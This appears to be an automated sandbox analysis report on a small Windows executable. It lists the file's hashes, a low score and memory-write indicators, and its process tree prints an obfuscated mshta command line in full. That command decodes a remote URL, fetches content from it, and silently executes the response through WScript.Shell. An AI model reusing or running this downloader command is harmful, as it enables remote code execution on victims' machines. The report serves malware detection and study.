bf44cfa6534d38b172ea611502230f1978f26a28cb1b510ed1c2cd6bd15f007f

Analysis

max time kernel
2s
max time network
57s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
24/12/2023, 21:52

Target

13e7feb9430554945b5aa4f6b5524d66.exe
Size

3KB
MD5

13e7feb9430554945b5aa4f6b5524d66
SHA1

3d644cfe881c9c5e80f94f0173dc3fa3169e145b
SHA256

bf44cfa6534d38b172ea611502230f1978f26a28cb1b510ed1c2cd6bd15f007f
SHA512

271912df0b8a74a9081a1c3457ac4290c19cd88ade2d42a48683d187aea9391c3fa6505154dcfa15358c3ca273c2203548c3d579dad0b4d063fd91d72bf4cc08

Score

1^/10

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3624 wrote to memory of 3964	3624	13e7feb9430554945b5aa4f6b5524d66.exe	20
PID 3624 wrote to memory of 3964	3624	13e7feb9430554945b5aa4f6b5524d66.exe	20
PID 3624 wrote to memory of 3964	3624	13e7feb9430554945b5aa4f6b5524d66.exe	20

C:\Users\Admin\AppData\Local\Temp\13e7feb9430554945b5aa4f6b5524d66.exe
"C:\Users\Admin\AppData\Local\Temp\13e7feb9430554945b5aa4f6b5524d66.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3624
- C:\Windows\SysWOW64\mshta.exe
  mshta "javascript:document.write();51;y=unescape('%325%33%7E%68t%74p%3A%2F%2Fa%73u%305%2Ef%75n%2Fh%72i%2F%3F%32f%652%652%62%7E%317%39').split('~');205;try{x='WinHttp';82;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);222;x.send();105;y='ipt.S';173;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);253;}catch(e){};202;;window.close();"
  2⤵
  PID:3964